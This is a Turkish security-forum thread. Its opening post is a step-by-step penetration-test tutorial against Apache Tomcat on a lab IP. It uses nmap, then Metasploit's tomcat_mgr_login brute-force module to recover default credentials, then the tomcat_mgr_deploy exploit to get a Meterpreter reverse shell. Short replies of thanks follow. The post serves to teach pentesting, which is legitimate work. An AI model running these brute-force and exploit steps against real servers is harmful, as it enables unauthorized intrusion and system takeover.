İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Apache Tomcat Sunucu Sızma Testi / Pentester

25-01-2017 13:06
#1
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Herkese merhaba,


Bu konuda, hedef bir sistemin, "Apache Tomcat" sunucusuna yönelik bir sızma testini nasıl gerçekleştirdiğimi anlatacağım.

"nmap -sV 192.168.127.130" komutu ile nmap ile portların servis ve version bilgilerini tarayalım.





8180. portta, "Apache Tomcat/Coyote JSP Engine 1.1" uygulaması çalışmakta, bizde bu uygulamaya yönelik,
métasploit içerisinde bulunan bir modül ile kaba kuvvet saldırısı uygulayacağız. Apache tomcat uygulamasının kullanıcı adı ve şifresini ele geçirip ardından yine métasploit içerisinde bulunan bir tomcat exploit ile hedef sisteme sızacağız ve meterpreter oturumu elde edeceğiz.
İlk önce "msfconsole" komutu ile métasploit framework’ ümüzü açalım.
Ardından, "use auxiliary/scanner/http/tomcat_mgr_login" modülüne girelim.




show options" komutu ile genel ayarları görelim.

Burada, "set RHOSTS 192.168.127.130" ve "set RPORT 8180" bilgilerini girdikten sonra "exploit" diyerek kaba kuvvet saldırısını gerçekleştiriyoruz.




Ve gördüğünüz gibi, "LOGİN SUCCESSFUL" yazısının yanında, "tomcat:tomcat" olarak kullanıcı adı ve şifre tespit edilmiş.
Artık bu bilgileride öğrendiğimize göre, sıra geldi exploit edip sisteme sızmaya.

"back" komutu ile bulunduğumuz auxiliary modülünden çıkıyoruz.

"use exploit/multi/http/tomcat_mgr_deploy" ile exploitimize giriyoruz.

"show options" ile genel ayarları yapıyoruz.




resimde gördüğünüz gibi gereken bilgileri girdikten sonra "exploit" komutunu çalıştırıyoruz.

Burada ekstradan payload seçmemize gerek yoktu. Çünkü, kendiliğinden "java/meterpreter/reverse_tcp" payload seçiliydi.

"exploit" komutunu verdikten sonra meterpreter oturumumuzu elde ediyoruz ve artık hedef sisteme sızmış bulunmaktayız.




Artık meterpreter komutları çalıştırabilirsiniz..





Shell açıp hedef sisteme girdik, artık ne istersek yapabiliriz

Bu eğitim konumunda sonuna geldim, okuduğunuz için teşekkür ederim .
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
Konu Pentester tarafından (25-01-2017 13:09 Saat 13:09 ) değiştirilmiştir.

25-01-2017 13:34
#2
cimbomenes1905 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2014
Nereden:
127.0.0.1
Mesajlar:
1.861
Teşekkür (Etti):
271
Teşekkür (Aldı):
325
Konular:
78
Ticaret:
(0) %
Eline sağlık dosttum, harika konu.
Pentester Teşekkür etti.
25-01-2017 13:35
#3
dump3cz - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2016
Nereden:
Kocaeli
Mesajlar:
2.391
Teşekkür (Etti):
814
Teşekkür (Aldı):
407
Konular:
159
Ticaret:
(0) %
Hocam çok kısa ve öz olmuş ellerine sağlık diğer yazıları renkli yaparmısın hep beyaz olmuyo (:
Pentester Teşekkür etti.
25-01-2017 13:39
#4
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Alıntı:
ConqueeXee´isimli üyeden Alıntı Mesajı göster
Hocam çok kısa ve öz olmuş ellerine sağlık diğer yazıları renkli yaparmısın hep beyaz olmuyo (:
Mobilden hazırlıyorum, Google docs üzerinde muhafaza ediyordum önceden. Paylaşmak istedim konulari, bu bile baya zamanımı aldı, kusura bakma
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
26-01-2017 11:13
#5
HolyShit - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2010
Mesajlar:
29
Teşekkür (Etti):
11
Teşekkür (Aldı):
1
Konular:
2
Ticaret:
(0) %
emeğinize sağlık
daha önceden kullanmıştım kaba kuvvet saldırısı yetersiz oldu
Pentester Teşekkür etti.
26-01-2017 11:51
#6
Nistagmus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Nereden:
Dünya
Mesajlar:
559
Teşekkür (Etti):
47
Teşekkür (Aldı):
87
Konular:
158
Ticaret:
(0) %
Allah razı olsun
Kullanıcı İmzası
N-İ-S-T-A-G-M-U-S

Bir Millet Zenginliğiyle Değil Ahlak Değeri İle Ölçülür.
-M. Kemal ATATÜRK
Pentester Teşekkür etti.
26-01-2017 11:52
#7
Üyelik tarihi:
01/2017
Mesajlar:
76
Teşekkür (Etti):
7
Teşekkür (Aldı):
5
Konular:
6
Ticaret:
(0) %
Ellerine sağlık
Kullanıcı İmzası
Pentester Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı